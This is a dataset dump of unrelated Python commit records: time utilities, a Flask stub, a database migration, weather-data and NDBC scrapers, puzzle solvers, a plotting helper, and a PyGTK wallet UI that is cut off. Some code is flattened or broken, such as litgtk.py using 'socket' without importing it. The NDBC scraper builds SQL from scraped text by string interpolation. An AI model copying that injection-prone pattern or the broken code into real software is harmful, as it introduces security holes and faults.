2dff474fe7723ebc7d7559fc77791924532d58db | reorder imports for pep8 | boltons/timeutils.py | boltons/timeutils.py | # -*- coding: utf-8 -*-
import bisect
import datetime
from datetime import timedelta
from strutils import cardinalize
def total_seconds(td):
    """\
    A pure-Python implementation of Python 2.7's timedelta.total_seconds().
    Accepts a timedelta object, returns number of total seconds.

    >>> td = datetime.timedelta(days=4, seconds=33)
    >>> total_seconds(td)
    345633.0
    """
    micros_per_second = 1000000.0
    # timedelta normalizes into (days, seconds, microseconds)
    whole_seconds = td.seconds + (td.days * 86400)  # 24 * 60 * 60
    total_micros = (whole_seconds * micros_per_second) + td.microseconds
    return total_micros / micros_per_second
_BOUNDS = [(0, timedelta(seconds=1), 'second'),
(1, timedelta(seconds=60), 'minute'),
(1, timedelta(seconds=3600), 'hour'),
(1, timedelta(days=1), 'day'),
(1, timedelta(days=7), 'week'),
(2, timedelta(days=30), 'month'),
(1, timedelta(days=365), 'year')]
_BOUNDS = [(b[0] * b[1], b[1], b[2]) for b in _BOUNDS]
_BOUND_DELTAS = [b[0] for b in _BOUNDS]
def decimal_relative_time(d, other=None, ndigits=0):
    """\
    Return a ``(number, unit_name)`` 2-tuple describing how far datetime
    *d* lies from *other* (default: current UTC time). The unit is the
    largest entry in ``_BOUNDS`` not exceeding the difference, and the
    number is rounded to *ndigits* places; positive means *d* is in the
    past relative to *other*, negative means the future.

    >>> now = datetime.datetime.utcnow()
    >>> decimal_relative_time(now - timedelta(days=1, seconds=3600), now)
    (1.0, 'day')
    >>> decimal_relative_time(now - timedelta(seconds=0.002), now, ndigits=5)
    (0.002, 'seconds')
    >>> '%g %s' % _
    '0.002 seconds'
    """
    if other is None:
        other = datetime.datetime.utcnow()
    diff = other - d
    diff_seconds = total_seconds(diff)
    # Pick the largest unit whose span does not exceed the absolute diff.
    b_idx = bisect.bisect(_BOUND_DELTAS, abs(diff)) - 1
    _, bunit, bname = _BOUNDS[b_idx]
    f_diff = diff_seconds / total_seconds(bunit)
    rounded_diff = round(f_diff, ndigits)
    # cardinalize pluralizes the unit name ('day' -> 'days') as needed.
    return rounded_diff, cardinalize(bname, abs(rounded_diff))
def relative_time(d, other=None, ndigits=0):
    """\
    >>> now = datetime.datetime.utcnow()
    >>> relative_time(now, ndigits=1)
    '0 seconds ago'
    >>> relative_time(now - timedelta(days=1, seconds=36000), ndigits=1)
    '1.4 days ago'
    >>> relative_time(now + timedelta(days=7), now, ndigits=1)
    '1 week from now'
    """
    magnitude, unit = decimal_relative_time(d, other, ndigits)
    # Negative magnitude means d lies in the future relative to other.
    suffix = 'from now' if magnitude < 0 else 'ago'
    return '%g %s %s' % (abs(magnitude), unit, suffix)
| # -*- coding: utf-8 -*-
import datetime
from datetime import timedelta
from strutils import cardinalize
def total_seconds(td):
"""\
A pure-Python implementation of Python 2.7's timedelta.total_seconds().
Accepts a timedelta object, returns number of total seconds.
>>> td = datetime.timedelta(days=4, seconds=33)
>>> total_seconds(td)
345633.0
"""
a_milli = 1000000.0
td_ds = td.seconds + (td.days * 86400) # 24 * 60 * 60
td_micro = td.microseconds + (td_ds * a_milli)
return td_micro / a_milli
import bisect
_BOUNDS = [(0, timedelta(seconds=1), 'second'),
(1, timedelta(seconds=60), 'minute'),
(1, timedelta(seconds=3600), 'hour'),
(1, timedelta(days=1), 'day'),
(1, timedelta(days=7), 'week'),
(2, timedelta(days=30), 'month'),
(1, timedelta(days=365), 'year')]
_BOUNDS = [(b[0] * b[1], b[1], b[2]) for b in _BOUNDS]
_BOUND_DELTAS = [b[0] for b in _BOUNDS]
def decimal_relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> decimal_relative_time(now - timedelta(days=1, seconds=3600), now)
(1.0, 'day')
>>> decimal_relative_time(now - timedelta(seconds=0.002), now, ndigits=5)
(0.002, 'seconds')
>>> '%g %s' % _
'0.002 seconds'
"""
if other is None:
other = datetime.datetime.utcnow()
diff = other - d
diff_seconds = total_seconds(diff)
abs_diff = abs(diff)
b_idx = bisect.bisect(_BOUND_DELTAS, abs_diff) - 1
bbound, bunit, bname = _BOUNDS[b_idx]
#f_diff, f_mod = divmod(diff_seconds, total_seconds(bunit))
f_diff = diff_seconds / total_seconds(bunit)
rounded_diff = round(f_diff, ndigits)
return rounded_diff, cardinalize(bname, abs(rounded_diff))
def relative_time(d, other=None, ndigits=0):
"""\
>>> now = datetime.datetime.utcnow()
>>> relative_time(now, ndigits=1)
'0 seconds ago'
>>> relative_time(now - timedelta(days=1, seconds=36000), ndigits=1)
'1.4 days ago'
>>> relative_time(now + timedelta(days=7), now, ndigits=1)
'1 week from now'
"""
drt, unit = decimal_relative_time(d, other, ndigits)
phrase = 'ago'
if drt < 0:
phrase = 'from now'
return '%g %s %s' % (abs(drt), unit, phrase)
| Python | 0 |
c86835059c6fcc657290382e743922b14e7e7656 | add server | server.py | server.py | from flask import Flask, request
app = Flask(__name__)
@app.route('/')
def root():
    """Handle requests to / by logging the request's JSON payload to
    stdout and returning a fixed greeting.

    NOTE(review): `request.json` is None (or raises, depending on the
    Flask version) when the body is not JSON -- confirm intended use.
    """
    print(request.json)
    return "hi"
if __name__ == '__main__':
app.run(debug=True, port=5000)
| Python | 0.000001 | |
a4bc16a375dc30e37034993bd07d3014f3b936e1 | Fix corrupt abstract field data | migrations/versions/201610041721_8b5ab7da2d5_fix_corrupt_abstract_field_data.py | migrations/versions/201610041721_8b5ab7da2d5_fix_corrupt_abstract_field_data.py | """Fix corrupt abstract field data
Revision ID: 8b5ab7da2d5
Revises: 52d970fb6a74
Create Date: 2016-10-04 17:21:19.186125
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = '8b5ab7da2d5'
down_revision = '52d970fb6a74'
def upgrade():
    """Normalize corrupt abstract-field values: JSON payloads that are an
    empty dict are rewritten to ``null`` for single_choice fields and to
    the empty string for text fields."""
    # We don't want any dicts in abstract field values...
    # Single choice fields with no value should be `null`, text fields should be empty
    op.execute('''
        UPDATE event_abstracts.abstract_field_values fv
        SET data = 'null'::json
        FROM events.contribution_fields cf
        WHERE data::jsonb = '{}'::jsonb AND cf.id = fv.contribution_field_id AND cf.field_type = 'single_choice';
        UPDATE event_abstracts.abstract_field_values fv
        SET data = '""'::json
        FROM events.contribution_fields cf
        WHERE data::jsonb = '{}'::jsonb AND cf.id = fv.contribution_field_id AND cf.field_type = 'text';
    ''')
def downgrade():
    # Data cleanup is irreversible; there is nothing sensible to restore.
    pass
| Python | 0.000414 | |
402911310eee757a0dd238466f11477c98c0748b | Add NARR solar radiation point sampler | scripts/coop/narr_solarrad.py | scripts/coop/narr_solarrad.py | """
Sample the NARR solar radiation analysis into estimated values for the
COOP point archive
1 langley is 41840.00 J m-2 is 41840.00 W s m-2 is 11.622 W hr m-2
So 1000 W m-2 x 3600 is 3,600,000 W s m-2 is 86 langleys
"""
import netCDF4
import datetime
import pyproj
import numpy
import iemdb
import sys
COOP = iemdb.connect('coop', bypass=True)
ccursor = COOP.cursor()
ccursor2 = COOP.cursor()
P4326 = pyproj.Proj(init="epsg:4326")
LCC = pyproj.Proj("+lon_0=-107.0 +y_0=0.0 +R=6367470.21484 +proj=lcc +x_0=0.0 +units=m +lat_2=50.0 +lat_1=50.0 +lat_0=50.0")
def get_gp(xc, yc, x, y):
    """ Return the grid point closest to this point

    Returns (gridx, gridy, distance): the x/y indices of the four grid
    nodes surrounding (x, y) and the euclidean distance to each.
    """
    xidx = (numpy.abs(xc - x)).argmin()
    yidx = (numpy.abs(yc - y)).argmin()
    # Step toward whichever side of the nearest node the point sits on
    movex = 1 if (x - xc[xidx]) >= 0 else -1
    movey = 1 if (y - yc[yidx]) >= 0 else -1
    gridx = [xidx, xidx + movex, xidx + movex, xidx]
    gridy = [yidx, yidx, yidx + movey, yidx + movey]
    distance = [((y - yc[gy]) ** 2 + (x - xc[gx]) ** 2) ** 0.5
                for gx, gy in zip(gridx, gridy)]
    return gridx, gridy, distance
def do( date ):
    """ Process for a given date
    6z file has 6z to 9z data

    Accumulates the 3-hourly NARR downward shortwave radiation analyses
    over the 24 hours starting at 6z, then stores an inverse-distance
    weighted estimate (in langleys) for every COOP station with data on
    this date.
    """
    sts = date.replace(hour=6) # 6z
    ets = sts + datetime.timedelta(days=1)
    now = sts
    interval = datetime.timedelta(hours=3)
    # Sum the eight 3-hour analyses covering 6z today through 6z tomorrow
    while now < ets:
        fn = now.strftime("/mesonet/ARCHIVE/data/%Y/%m/%d/model/NARR/"+
                          "rad_%Y%m%d%H00.nc")
        nc = netCDF4.Dataset( fn )
        rad = nc.variables['Downward_shortwave_radiation_flux'][0,:,:]
        if now == sts:
            xc = nc.variables['x'][:] * 1000.0 # convert to meters
            yc = nc.variables['y'][:] * 1000.0 # convert to meters
            # flux (W m-2) times 10800 s gives J m-2 over the 3 hours
            total = rad * 10800.0 # 3 hr rad to total rad
        else:
            total += (rad * 10800.0)
        nc.close()
        now += interval
    ccursor.execute("""
    SELECT station, x(geom), y(geom) from alldata a JOIN stations t on
    (a.station = t.id) where day = %s
    """, (date.strftime("%Y-%m-%d"), ))
    for row in ccursor:
        # Station lon/lat -> NARR Lambert Conformal grid coordinates
        (x,y) = pyproj.transform(P4326, LCC, row[1], row[2])
        (gridxs, gridys, distances) = get_gp(xc, yc, x, y)
        z0 = total[gridys[0], gridxs[0]]
        z1 = total[gridys[1], gridxs[1]]
        z2 = total[gridys[2], gridxs[2]]
        z3 = total[gridys[3], gridxs[3]]
        # Inverse-distance weighted average of the four surrounding nodes
        val = ((z0/distances[0] + z1/distances[1] + z2/distances[2]
                + z3/distances[3]) / (1./distances[0] + 1./distances[1] +
                1./distances[2] + 1./distances[3] ))
        # 41840 J m-2 per langley (see conversion note in module header)
        langleys = val / 41840.0
        if langleys < 0:
            print 'WHOA! Negative RAD: %.2f, station: %s' % (langleys, row[0])
            continue
        # NOTE(review): table name built by concatenation; row[0][:2] comes
        # from our own database, but parameterization would still be safer.
        ccursor2.execute("""
        UPDATE alldata_"""+ row[0][:2] +""" SET narr_srad = %s WHERE
        day = %s and station = %s
        """, (langleys, date.strftime("%Y-%m-%d"), row[0]))
do( datetime.datetime(int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])) )
ccursor2.close()
COOP.commit()
COOP.close() | Python | 0 | |
e4e572925e987fba59c3421a80d9bc247e04026d | add scraper of NDBC metadata | scripts/dbutil/scrape_ndbc.py | scripts/dbutil/scrape_ndbc.py | """See if we can get metadata dynmically from NDBC
var currentstnlat = 29.789;
var currentstnlng = -90.42;
var currentstnname = '8762482 - West Bank 1, Bayou Gauche, LA';
<b>Site elevation:</b> sea level<br />
"""
import requests
import psycopg2
from pyiem.reference import nwsli2country, nwsli2state
OUTPUT = open('insert.sql', 'w')
def compute_network(nwsli):
    """Derive (country, state, network) for a NWSLI identifier.

    The two-letter state/country code lives in characters 4-5 of the
    identifier. Returns (None, None, None) and prints a diagnostic when
    no state can be resolved.
    """
    suffix = nwsli[3:]
    country = nwsli2country.get(suffix)
    state = nwsli2state.get(suffix)
    if state is not None:
        if country == 'US':
            return "US", state, "%s_DCP" % (state,)
        return country, state, "%s_%s_DCP" % (country, state)
    print(("Failure to compute state for nwsli: %s [country:%s, state:%s]"
           ) % (nwsli, country, state))
    return None, None, None
def do(nwsli):
    """Scrape the NDBC station page for `nwsli` and append an INSERT
    statement for the station to the global OUTPUT SQL file.

    Returns early (after printing a diagnostic) when the page cannot be
    fetched, cannot be parsed, or the network cannot be computed.
    """
    uri = "http://www.ndbc.noaa.gov/station_page.php?station=%s" % (nwsli,)
    req = requests.get(uri)
    if req.status_code != 200:
        print("do(%s) failed with status code: %s" % (nwsli, req.status_code))
        return
    html = req.content
    # -999 marks 'elevation unknown' until the page provides a value
    meta = {'elevation': -999}
    for line in html.split("\n"):
        # Lines like: var currentstnlat = 29.789;  -> meta['currentstnlat']
        if line.strip().startswith("var currentstn"):
            tokens = line.strip().split()
            meta[tokens[1]] = " ".join(tokens[3:]).replace(
                '"', "").replace(";", "").replace("'", "")
        # Lines like: <b>Site elevation:</b> sea level<br />
        if line.find("<b>Site elevation:</b>") > -1:
            elev = line.strip().replace(
                "<b>Site elevation:</b>",
                "").replace("<br />", "").replace("above mean sea level",
                                                  "").strip()
            meta['elevation'] = (float(elev.replace("m", ""))
                                 if elev != 'sea level' else 0)
    if 'currentstnlng' not in meta:
        print("Failure to scrape: %s" % (nwsli,))
        return
    # currentstnname looks like '8762482 - West Bank 1, ...'; swap the parts
    tokens = meta['currentstnname'].split("-")
    name = "%s - %s" % (tokens[1].strip(), tokens[0].strip())
    country, state, network = compute_network(nwsli)
    if network is None:
        return
    lon = float(meta['currentstnlng'])
    lat = float(meta['currentstnlat'])
    # NOTE(review): SQL built by string interpolation -- a scraped name
    # containing a quote will break (or inject into) this statement.
    sql = """INSERT into stations(id, name, network, country, state,
    plot_name, elevation, online, metasite, geom) VALUES ('%s', '%s', '%s',
    '%s', '%s', '%s', %s, 't', 'f', 'SRID=4326;POINT(%s %s)');
    """ % (nwsli, name, network, country, state, name, meta['elevation'], lon,
           lat)
    OUTPUT.write(sql)
def main():
    """Scrape NDBC metadata for every unknown NWSLI seen in OSO products
    and close the generated SQL output file when done."""
    pgconn = psycopg2.connect(database='hads', host='iemdb', user='nobody')
    cursor = pgconn.cursor()
    cursor.execute("""SELECT distinct nwsli from unknown where
    product ~* 'OSO' ORDER by nwsli""")
    for row in cursor:
        do(row[0])
    OUTPUT.close()
if __name__ == '__main__':
main()
| Python | 0 | |
ef745ed086ebd8e77e158c89b577c77296630320 | Add solution for 118 pascals triangle | Python/118_Pascals_Triangle.py | Python/118_Pascals_Triangle.py | class Solution(object):
def generate(self, numRows):
"""
:type numRows: int
:rtype: List[List[int]]
"""
res = [[1],[1,1]]
if numRows == 0:
return []
elif numRows == 1:
return [[1]]
else:
old = [1,1]
for i in xrange(numRows-2):
temp = [1]
for j in xrange(len(old)-1):
temp.append(old[j]+old[j+1])
temp.append(1)
res.append(temp)
old = temp
return res
if __name__ == '__main__':
print Solution().generate(6)
| Python | 0.000864 | |
af7abc0fc476f7c048790fc8b378ac1af8ae8b33 | Create top-k-frequent-words.py | Python/top-k-frequent-words.py | Python/top-k-frequent-words.py | # Time: O(n + klogk) on average
# Space: O(n)
# Given a non-empty list of words, return the k most frequent elements.
#
# Your answer should be sorted by frequency from highest to lowest.
# If two words have the same frequency, then the word with the lower alphabetical order comes first.
#
# Example 1:
# Input: ["i", "love", "leetcode", "i", "love", "coding"], k = 2
# Output: ["i", "love"]
# Explanation: "i" and "love" are the two most frequent words.
# Note that "i" comes before "love" due to a lower alphabetical order.
# Example 2:
# Input: ["the", "day", "is", "sunny", "the", "the", "the", "sunny", "is", "is"], k = 4
# Output: ["the", "is", "sunny", "day"]
# Explanation: "the", "is", "sunny" and "day" are the four most frequent words,
# with the number of occurrence being 4, 3, 2 and 1 respectively.
# Note:
# You may assume k is always valid, 1 ≤ k ≤ number of unique elements.
# Input words contain only lowercase letters.
#
# Follow up:
# Try to solve it in O(n log k) time and O(n) extra space.
# Can you solve it in O(n) time with only O(k) extra space?
from random import randint
class Solution(object):
    def topKFrequent(self, words, k):
        """Return the k most frequent words, most frequent first; ties are
        broken by ascending alphabetical order.

        :type words: List[str]
        :type k: int
        :rtype: List[str]

        Average O(n + k log k): counting is O(n), quickselect partitions
        the (negated count, word) pairs around the k-th element in O(n)
        average, and only the selected k pairs are sorted.
        """
        from collections import defaultdict  # stdlib; import was missing
        counts = defaultdict(int)
        for word in words:
            counts[word] += 1
        # Negate counts so tuple order means (most frequent, alphabetical).
        pairs = [(-count, word) for word, count in counts.items()]
        self.kthElement(pairs, k)
        return [word for _, word in sorted(pairs[:k])]

    def kthElement(self, nums, k):  # O(n) on average
        """Partially order nums in place so nums[:k] holds the k smallest
        elements (quickselect with a random pivot)."""
        def partition_around_pivot(left, right, pivot_idx, nums):
            pivot_value = nums[pivot_idx]
            new_pivot_idx = left
            nums[pivot_idx], nums[right] = nums[right], nums[pivot_idx]
            for i in range(left, right):
                if nums[i] < pivot_value:
                    nums[i], nums[new_pivot_idx] = nums[new_pivot_idx], nums[i]
                    new_pivot_idx += 1
            nums[right], nums[new_pivot_idx] = nums[new_pivot_idx], nums[right]
            return new_pivot_idx

        left, right = 0, len(nums) - 1
        while left <= right:
            pivot_idx = randint(left, right)
            new_pivot_idx = partition_around_pivot(left, right, pivot_idx, nums)
            if new_pivot_idx == k - 1:
                return
            elif new_pivot_idx > k - 1:
                right = new_pivot_idx - 1
            else:  # new_pivot_idx < k - 1.
                left = new_pivot_idx + 1
| Python | 0.999054 | |
60841e5b5a5f7e89c986fa202633ccf1a0f35315 | Add main module | src/validator.py | src/validator.py | # -*- coding: utf-8 -*-
#
# This module is part of the GeoTag-X project validator tool.
#
# Author: Jeremy Othieno (j.othieno@gmail.com)
#
# Copyright (c) 2016 UNITAR/UNOSAT
#
# The MIT License (MIT)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
def main():
    """Executes the application.
    """
    import sys
    arguments = _get_argparser().parse_args(sys.argv[1:])
    return run(arguments)
def run(arguments):
    """Executes the application with the specified command-line arguments.
    Args:
        arguments (list): A list of command-line argument strings.
    """
    # Stub: the actual validation pipeline has not been implemented yet.
    raise NotImplementedError()
def _version():
    """Returns the tool's version string.
    """
    # NOTE(review): implicit relative import -- resolves only under
    # Python 2 semantics / from inside the package; confirm layout.
    from __init__ import __version__
    return "GeoTag-X Project Validator v%s, Copyright (C) 2016 UNITAR/UNOSAT." % __version__
def _get_argparser():
    """Constructs the application's command-line argument parser.
    Returns:
        argparse.ArgumentParser: A command-line argument parser instance.
    """
    # Stub: parser construction not implemented yet; main() depends on it.
    raise NotImplementedError()
| Python | 0.000001 | |
344ee4f5aafa19271a428d171f14b52d26a3f588 | Create solver.py | solver.py | solver.py | from models import Table
from utils import sector_counter, clearscreen
#start with blank screen
clearscreen()
# building the blank sudoku table
sudoku = Table()
# Having the user enter the sudoku puzzle
sudoku.get_table()
print("This is your sudoku puzzle:")
print(sudoku)
num = 1
row = 0
col = 0
counter = 0
max_tries = 1000
# This will loop through while the puzzle isn't solved, or until it's reached the maximum tries.
while sudoku.puzzle_has_blanks() and counter < max_tries:
for num in range(10):
# this will cause it to iterate through the sectors in the grid
for sector_id in range(9):
#setting the number of flagged/possible spots to 0
sudoku.flagged_spots = 0
# the massive if statements that looks at a box in the puzzle to determine if those things are all true.
for number_in_block,row,col in sudoku.iter_sector(sector_id):
if (sudoku.current_box_is_blank(row,col)
and sudoku.num_is_not_in_sector(row, col, num)
and sudoku.num_is_not_in_row(row, col, num)
and sudoku.num_is_not_in_col(row, col, num)):
# if all are true, it flags that spot as a possible solution, and records it.
sudoku.flagged_spots += 1
sudoku.flag_num = num
sudoku.flag_row = row
sudoku.flag_col = col
number_that_was_in_block = number_in_block
# print("I'm flagging {},{}, for number: {} which is in sector {}, and this is the {} flag.".format(row,col,num,sector_id,sudoku.flagged_spots))
# prior to going to the next number, if only one flag has been created in the section, the spot must be good, so it updates the table.
if sudoku.flagged_spots == 1:
sudoku.table[sudoku.flag_row][sudoku.flag_col] = sudoku.flag_num
print("Putting {} in sector {} at {} row {} col.".format(num, sector_id+1, sudoku.flag_row+1, sudoku.flag_col+1))
counter +=1
if counter == max_tries:
print ("The solver took {} passes at it, and this is the best if could do:".format(counter))
else:
print("Here is your solved puzzle! It took {} passes.".format(counter))
print(sudoku)
| Python | 0 | |
8752c36c89e3b2a6b012761d1b24183391245fea | Create Node.py | service/Node.py | service/Node.py | #########################################
# Node.py
# description: embedded node js
# categories: [programming]
# possibly more info @: http://myrobotlab.org/service/Node
#########################################
# start the service
node = Runtime.start("node","Node")
| Python | 0.000003 | |
3874a618fa30787b48578430d8abcdc29549102d | solve problem no.1991 | 01xxx/1991/answer.py | 01xxx/1991/answer.py | from typing import Dict
class Node:
    """A binary-tree node that prints its value during traversal."""

    def __init__(self, value):
        self.value: str = value
        self.left: 'Node' = None
        self.right: 'Node' = None

    def preorder_traversal(self):
        """Print node, then left subtree, then right subtree."""
        print(self.value, end='')
        for child in (self.left, self.right):
            if child:
                child.preorder_traversal()

    def inorder_traversal(self):
        """Print left subtree, then node, then right subtree."""
        if self.left:
            self.left.inorder_traversal()
        print(self.value, end='')
        if self.right:
            self.right.inorder_traversal()

    def postorder_traversal(self):
        """Print left subtree, then right subtree, then node."""
        for child in (self.left, self.right):
            if child:
                child.postorder_traversal()
        print(self.value, end='')
Nodes: Dict[str, Node] = {}
N: int = int(input())
value:str
left:str
right:str
for _ in range(N):
value, left, right = input().split()
if value not in Nodes:
Nodes[value] = Node(value)
if left != '.':
if left not in Nodes:
Nodes[left] = Node(left)
Nodes[value].left = Nodes[left]
if right != '.':
if right not in Nodes:
Nodes[right] = Node(right)
Nodes[value].right = Nodes[right]
Nodes['A'].preorder_traversal()
print()
Nodes['A'].inorder_traversal()
print()
Nodes['A'].postorder_traversal() | Python | 0.017639 | |
f77b45b06f88912d154a5fd5b04d69780618110b | Fix migration [WAL-616] | src/nodeconductor_openstack/openstack_tenant/migrations/0024_add_backup_size.py | src/nodeconductor_openstack/openstack_tenant/migrations/0024_add_backup_size.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations
from nodeconductor_openstack.openstack_tenant.models import Backup
def add_backup_size_to_metadata(apps, schema_editor):
for backup in Backup.objects.iterator():
backup.metadata['size'] = backup.instance.size
backup.save()
class Migration(migrations.Migration):
dependencies = [
('openstack_tenant', '0023_remove_instance_external_ip'),
]
operations = [
migrations.RunPython(add_backup_size_to_metadata),
]
| Python | 0 | |
41d6401780b63a6d835ad48a40df183d6748c99a | add moe plotter utility | smt/extensions/moe_plotter.py | smt/extensions/moe_plotter.py | import six
import numpy as np
from matplotlib import colors
import matplotlib.pyplot as plt
class MOEPlotter(object):
def __init__(self, moe, xlimits):
self.moe = moe
self.xlimits = xlimits
################################################################################
def plot_cluster(self, x_, y_):
"""
Plot distribsian cluster
Parameters:
-----------
xlimits: array_like
array[ndim, 2]
x_: array_like
Input training samples
y_: array_like
Output training samples
Optionnals:
-----------
heaviside: float
Heaviside factor. Default to False
"""
GMM=self.moe.cluster
xlim = self.xlimits
if GMM.n_components > 1:
colors_ = list(six.iteritems(colors.cnames))
dim = xlim.shape[0]
weight = GMM.weights_
mean = GMM.means_
cov = GMM.covars_
prob_ = self.moe._proba_cluster(x_)
sort = np.apply_along_axis(np.argmax, 1, prob_)
if dim == 1:
fig = plt.figure()
x = np.linspace(xlim[0, 0], xlim[0, 1])
prob = self.moe._proba_cluster(x)
for i in range(len(weight)):
plt.plot(x, prob[:, i], ls='--')
plt.xlabel('Input Values')
plt.ylabel('Membership probabilities')
plt.title('Cluster Map')
fig = plt.figure()
for i in range(len(sort)):
color_ind = int(((len(colors_) - 1) / sort.max()) * sort[i])
color = colors_[color_ind][0]
plt.plot(x_[i], y_[i], c=color, marker='o')
plt.xlabel('Input Values')
plt.ylabel('Output Values')
plt.title('Samples with clusters')
if dim == 2:
x0 = np.linspace(xlim[0, 0], xlim[0, 1], 20)
x1 = np.linspace(xlim[1, 0], xlim[1, 1], 20)
xv, yv = np.meshgrid(x0, x1)
x = np.array(zip(xv.reshape((-1,)), yv.reshape((-1,))))
prob = self.moe._proba_cluster(x)
fig = plt.figure()
ax1 = fig.add_subplot(111, projection='3d')
for i in range(len(weight)):
color = colors_[int(((len(colors_) - 1) / len(weight)) * i)][0]
ax1.plot_trisurf(x[:, 0], x[:, 1], prob[:, i], alpha=0.4, linewidth=0,
color=color)
plt.title('Cluster Map 3D')
fig1 = plt.figure()
for i in range(len(weight)):
color = colors_[int(((len(colors_) - 1) / len(weight)) * i)][0]
plt.tricontour(x[:, 0], x[:, 1], prob[:, i], 1, colors=color, linewidths=3)
plt.title('Cluster Map 2D')
fig = plt.figure()
ax2 = fig.add_subplot(111, projection='3d')
for i in range(len(sort)):
color = colors_[int(((len(colors_) - 1) / sort.max()) * sort[i])][0]
ax2.scatter(x_[i][0], x_[i][1], y_[i], c=color)
plt.title('Samples with clusters')
plt.show()
| Python | 0 | |
393735aaf76b6ddf773a06a72f0872334e56557e | add litgtk.py file | cmd/litgtk/litgtk.py | cmd/litgtk/litgtk.py | #!/usr/bin/env python
import websocket # `pip install websocket-client`
import json
import pygtk
pygtk.require('2.0')
import gtk
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # global for socket connection
def getBal():
rpcCmd = {
"method": "LitRPC.Bal",
"params": [{
}]
}
rpcCmd.update({"jsonrpc": "2.0", "id": "93"})
print(json.dumps(rpcCmd))
s.sendall(json.dumps(rpcCmd))
r = json.loads(s.recv(8000000))
print(r)
return r["result"]["TotalScore"]
def getAdr():
    """Fetch the wallet's most recently generated receive address."""
    request = {
        "method": "LitRPC.Address",
        "params": [{
            "NumToMake": 0,
        }],
    }
    request.update({"jsonrpc": "2.0", "id": "94"})
    payload = json.dumps(request)
    print(payload)
    s.sendall(payload)
    reply = json.loads(s.recv(8000000))
    print(reply)
    # NumToMake=0 means "just list existing"; hand back the newest (last) one.
    return reply["result"]["PreviousAddresses"][-1]
def prSend(adr, amt):
    """Send `amt` satoshis to address `adr`; return a human-readable status.

    Returns "send error: ..." when the RPC reports an error, otherwise
    "Sent. TXID: ..." with the first transaction id.
    """
    rpcCmd = {
            "method": "LitRPC.Send",
            "params": [{"DestAddrs": [adr,],"Amts": [amt,]}]
    }
    rpcCmd.update({"jsonrpc": "2.0", "id": "95"})
    print(json.dumps(rpcCmd))
    s.sendall(json.dumps(rpcCmd))
    r = json.loads(s.recv(8000000))
    print(r)
    if r["error"] is not None:  # identity comparison is the idiomatic None test
        return "send error: " + r["error"]
    return "Sent. TXID: " + r["result"]["Txids"][0]
class lndrpcui:
    # Minimal PyGTK front-end for a lit node: shows balance / receive address
    # and lets the user send coins via the JSON-RPC socket helpers above.
    def dialogg(self, widget, adrWidget, amtWidget):
        # "Send" button callback: fire the RPC and show the resulting txid
        # (or error text) in a modal message dialog.
        txid = prSend(adrWidget.get_text(), amtWidget.get_value_as_int())
        d = gtk.MessageDialog(
            type=gtk.MESSAGE_INFO, buttons=gtk.BUTTONS_OK,message_format=txid)
        d.run()
        d.destroy()
    def gBal(self, widget, balWidget, rcvadrWidget):
        # "Refresh" button callback: update both the balance label (satoshis
        # plus a BTC conversion) and the current receive address.
        bal = getBal()
        balWidget.set_text("Balance: " + "{:,}".format(bal) + " (" + str(bal/100000000.0) + "BTC)")
        adr = getAdr()
        rcvadrWidget.set_text(adr)
    def __init__(self):
        # Build the whole window: receive-address frame, balance frame with a
        # refresh button, a send form (address entry + satoshi spinner) and a
        # quit button.  Packing order defines the on-screen layout.
        window = gtk.Window(gtk.WINDOW_TOPLEVEL)
        self.window = window
        window.connect("destroy", lambda w: gtk.main_quit())
        window.set_title("lit-gtk")
        main_vbox = gtk.VBox(False, 5)
        main_vbox.set_border_width(10)
        window.add(main_vbox)
        rcvFrame = gtk.Frame("Receive Address")
        main_vbox.pack_start(rcvFrame, True, False, 0)
        #~ receive-address row (label is selectable so it can be copied)
        rcvhbox = gtk.HBox(False, 0)
        rcvhbox.set_border_width(5)
        rcvFrame.add(rcvhbox)
        rcvLabel = gtk.Label("receive address here")
        rcvLabel.set_selectable(True)
        rcvhbox.pack_start(rcvLabel, False, False, 5)
        balFrame = gtk.Frame("balance")
        main_vbox.pack_start(balFrame, True, False, 0)
        #~ balance row: refresh button on the left, balance text on the right
        balhbox = gtk.HBox(False, 0)
        balhbox.set_border_width(5)
        balFrame.add(balhbox)
        balLabel = gtk.Label("balance here")
        refreshButton = gtk.Button("Refresh")
        refreshButton.connect("clicked", self.gBal, balLabel, rcvLabel)
        balhbox.pack_start(refreshButton, False, False, 5)
        balhbox.pack_end(balLabel, False, False, 5)
        #~ send form: address / amount inputs stacked above the Send button
        frame = gtk.Frame("send coins (satoshis)")
        main_vbox.pack_start(frame, True, False, 0)
        vbox = gtk.VBox(False, 0)
        vbox.set_border_width(5)
        frame.add(vbox)
        #~ adr / amt hbox
        hbox = gtk.HBox(False, 0)
        vbox.pack_start(hbox, False, False, 5)
        sendButton = gtk.Button("Send")
        vbox.pack_start(sendButton, False, False, 5)
        #~ destination-address column
        adrVbox = gtk.VBox(False, 0)
        hbox.pack_start(adrVbox, True, True, 5)
        adrLabel = gtk.Label("send to address")
        adrLabel.set_alignment(0, 1)
        adrVbox.pack_start(adrLabel, False, False, 0)
        adrEntry = gtk.Entry(50)
        adrEntry.set_size_request(500, -1)
        adrVbox.pack_start(adrEntry, True, True, 0)
        #~ amount column (spinner range 1e6 .. 1e8 satoshis)
        amtVbox = gtk.VBox(False, 0)
        hbox.pack_start(amtVbox, False, False, 5)
        label = gtk.Label("amount")
